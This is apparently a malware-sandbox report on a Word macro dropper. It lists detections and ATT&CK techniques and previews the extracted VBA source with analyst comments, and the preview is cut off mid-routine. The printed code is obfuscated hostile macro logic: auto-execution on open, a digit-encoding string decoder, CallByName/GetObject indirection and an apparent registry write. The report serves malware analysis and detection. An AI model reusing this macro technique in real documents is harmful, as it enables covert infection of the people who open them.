MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with a Document_Open auto-execution routine, indicative of malicious intent. The macro utilizes CreateObject and CallByName functions, suggesting it attempts to download and execute a second-stage payload. ClamAV detection as 'Doc.Dropper.Agent-6935193-0' further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6935193-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6935193-0
-
VBA macros detected — medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
GetObject call — high — OLE_VBA_GETOBJ: GetObject call
-
CallByName call — high — OLE_VBA_CALLBYNAME: CallByName call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, or documents whose source extraction failed, where the visible macro source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 33386 bytes |
| SHA-256: 4874d6b53117bca9fc78d50d6efd06da19998dff2dd9f066a06994d3c78f797b | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-execution entry point (the OLE_VBA_DOCOPEN finding above): Word runs
' this as soon as the document is opened with macros enabled. Nothing
' suspicious lives in this module — it only chains three Module1 routines —
' so a reviewer who looks at ThisDocument alone sees a harmless-looking stub.
Public Sub Document_Open()
Module1.pmxv
Module1.wxbl
Module1.eage
End Sub
Attribute VB_Name = "uuuu1"
Attribute VB_Base = "0{6BE93EFA-B396-4689-9A8F-63E11C044147}{7B8A702A-D7CD-4287-9EEC-36B44DF6449A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Empty Change event handler for a control named ttt1 in module uuuu1. The
' module header's VB_Base carries a CLSID pair, which looks like a UserForm
' module — TODO confirm from the OLE streams. No code executes here.
Private Sub ttt1_Change()
End Sub
Attribute VB_Name = "Module1"
' Third routine run from Document_Open. Every member name and string argument
' is produced by eyak() from a digit string, so nothing here is readable
' statically until that decoder is applied. The tokens spliced into the digit
' strings (lssa, doxx, vdvk, cgik, rump, pxtq, tqjf, wewy, csvd, ejlw, cdmi,
' cbqh, cwlr, opkp, acdc, lrwf, pxev, uqbt, nrqk, shjn, qqiw, dpen, bozr) are
' never declared or assigned in the visible source; there is no Option Explicit
' in Module1, so they are Empty and contribute nothing to the concatenation —
' unless the truncated part of the script assigns them. Decode with the real
' values, not the literals alone.
Function eage()
' hetx is the Word Application object; vvtb (undeclared, so a Variant) receives
' whatever member eyak(...) names. pohk is also undeclared and is passed as the
' CallType argument — NOTE(review): Empty coerces to 0, which is not one of the
' VbCallType values; how CallByName resolves this should be confirmed
' dynamically.
Set hetx = Application
Set vvtb = CallByName(hetx, eyak("0" & lssa & "341341" & doxx & "34" & vdvk & "1" & cgik & "29" & vdvk & ""), pohk)
' Invokes a method (VbMethod) on that object with three decoded strings and
' five literal numeric arguments. The decoded strings are where the actual
' command/target details live — recover them with eyak's rule before triage.
CallByName vvtb, eyak("0" & rump & "300" & lssa & "" & pxtq & "" & tqjf & "33" & vdvk & ""), VbMethod, eyak("0" & rump & "30" & wewy & "13" & csvd & "81" & tqjf & "291" & ejlw & "5108813" & cdmi & "31" & cbqh & "33"), eyak("10" & cwlr & "" & cwlr & "00511" & opkp & "30" & wewy & "13" & csvd & "81" & tqjf & "291" & ejlw & "51" & bozr & "1" & tqjf & "3" & cdmi & "41" & doxx & "" & cbqh & "290511" & doxx & "3405" & acdc & "" & lrwf & "01" & ejlw & "51" & wewy & "1" & cbqh & "2813111" & pxev & "" & uqbt & "41" & nrqk & "" & pxtq & "2005" & shjn & "81" & doxx & "3" & uqbt & "305" & shjn & "" & uqbt & "" & cwlr & "413405" & shjn & "81" & cbqh & "33" & qqiw & "05" & shjn & "012" & acdc & "" & acdc & "4" & wewy & "" & dpen & "051" & bozr & "1" & tqjf & "3" & cdmi & "41" & doxx & "" & cbqh & "29"), 0, 1, 0, 0, 0
End Function
' First routine run from Document_Open. Builds two strings (hetx, vvtb) and one
' COM object (jxpd) entirely from eyak()-decoded material, then calls a single
' method on that object. As in eage, the tokens mixed into the digit strings
' (uqbt, cdmi, doxx, cbqh, djwa, vdvk, pxev, cwlr, csvd, wewy, hbnk, tqjf,
' pxtq, dpen, ldxy, acdc, ksch, bozr, jaic, shjn, opkp, ejlw, lrwf, lvzg, rump,
' dpwa, cgik, pohk) are undeclared in the visible source and therefore Empty
' unless the truncated remainder assigns them.
Function pmxv()
' VBA gotcha: this declares hetx as Variant and only vvtb As String.
Dim hetx, vvtb As String
Set bbia = Application
' Reads one member of the Application object (named by the decoded string) into
' ezuw; that value is spliced into the middle of hetx below, so hetx is partly
' derived from the host environment rather than fully hard-coded. pohk is the
' same undeclared CallType argument noted in eage.
ezuw = CallByName(bbia, eyak("10" & uqbt & "013" & cdmi & "41" & doxx & "" & cbqh & "29"), pohk)
hetx = eyak("" & djwa & "1" & cbqh & "21" & vdvk & "13811" & pxev & "" & cwlr & "011109" & csvd & "4" & wewy & "1" & hbnk & "" & cbqh & "341" & cbqh & "21" & vdvk & "11109812" & acdc & "" & acdc & "4" & wewy & "1" & tqjf & "11") & ezuw & eyak("111088139" & wewy & "1" & tqjf & "" & pxtq & "11" & djwa & "" & dpen & "" & wewy & "13" & pxev & "" & cwlr & "4" & vdvk & "140")
vvtb = eyak("084" & wewy & "" & wewy & "1" & tqjf & "3413410" & ldxy & "5098096")
' liha() wraps GetObject (the OLE_VBA_GETOBJ finding): jxpd is whatever COM
' object the decoded moniker string binds to. Its class cannot be read off the
' source without decoding.
Set jxpd = liha(eyak("1381" & doxx & "29128122128" & vdvk & "1340771421" & doxx & "2813" & acdc & "013" & cdmi & "41" & cbqh & "2" & ksch & "" & pxev & "" & uqbt & "41" & cbqh & "2909" & uqbt & "0" & bozr & "1" & tqjf & "270801" & doxx & "2813" & acdc & "013" & cdmi & "41" & cbqh & "2" & ksch & "" & pxev & "" & uqbt & "014405211111" & jaic & "511" & shjn & "31" & cbqh & "30" & vdvk & "1111" & opkp & "" & tqjf & "2111" & pxev & "61" & pxtq & "" & ejlw & "77" & djwa & "" & vdvk & "1" & opkp & "0" & acdc & "012209" & lrwf & "3" & lvzg & "" & bozr & ""))
' Method call with a hex root constant, the two strings, and 1. &H80000001 is
' the numeric value of HKEY_CURRENT_USER in the Windows registry API, so if
' jxpd turns out to be a registry-capable object this is consistent with a
' write under HKCU using hetx/vvtb — presumably for persistence or staging.
' Confirm by decoding the method name and by watching registry writes in a
' sandbox run; that is also the place to anchor a detection.
CallByName jxpd, eyak("" & djwa & "1" & tqjf & "" & ejlw & "" & rump & "06098101087" & dpwa & "1" & cgik & "" & pxtq & "3" & csvd & "0"), VbMethod, &H80000001, hetx, vvtb, 1
End Function
' Thin wrapper around GetObject (the OLE_VBA_GETOBJ finding). Given a decoded
' moniker/path string it returns the COM object that moniker binds to; the
' indirection keeps the literal "GetObject" out of the callers' lines. Fails
' with a runtime automation error if the moniker cannot be resolved.
Function liha(hetx As String) As Object
Set liha = GetObject(hetx)
End Function
' String decoder behind every obfuscated literal in Module1. The input is a
' run of decimal digits that is consumed three characters at a time: yyor takes
' the leading chunk, ocfg turns it into Chr(chunk - 19), omss drops the chunk,
' and the characters are appended in order. For example "084" -> Chr(65) = "A".
' Reproducing this rule in an analysis script is enough to recover all the
' member names, monikers and strings used by eage and pmxv — provided the
' undeclared tokens spliced into the inputs are given their real values.
' Edge cases visible in the code: an empty input still runs the loop body once,
' where Chr("" - 19) raises a type-mismatch error, and an input whose length is
' not a multiple of 3 ends in an invalid-procedure-call error on the last
' chunk (Right with a negative length / Chr outside its range).
Function eyak(vvtb As String) As String
Dim hetx As String
hetx = ""
Do
' Append the decoded character for the leading 3-digit chunk...
hetx = hetx + ocfg(yyor(vvtb))
' ...and drop that chunk from the remaining input.
vvtb = omss(vvtb)
Loop While Len(vvtb) > 0
eyak = hetx
End Function
' Chunk-to-character step of the eyak decoder: the 3-digit string is coerced
' to a number, 19 is subtracted, and Chr() yields the character. Chr raises an
' invalid-procedure-call error for results outside its valid range, and a
' non-numeric input (e.g. an empty string) raises a type mismatch.
Function ocfg(vvtb)
ocfg = Chr(vvtb - 19)
End Function
' Head step of the eyak decoder: returns the first three characters of the
' remaining digit string (fewer if less than three are left).
Function yyor(vvtb)
yyor = Left(vvtb, 3)
End Function
' Tail step of the eyak decoder: drops the first three characters of the
' remaining digit string. Right() is given Len - 3, so an input shorter than
' three characters produces a negative length and an invalid-procedure-call
' error.
Function omss(vvtb)
omss = Right(vvtb, Len(vvtb) - 3)
End Function
Function wxbl()
Do While True
On Error GoTo Handler
Dim hetx, vvtb As Object
Set hetx = ocag(eyak("0" & "8" & "8" & "1" & "3" & "9" & wewy & "1" & tqjf & "2" & "7" & "0" & "6" & ldxy & "4" & "1" & "3" & shjn & "" & acdc & "" & emas & "4" & wewy & "1" & "1" & pxev & "" & uqbt & "4" & "1" & cbqh & "2" & "9"))
CallByName hetx, eyak("1" & "0" &
... (truncated)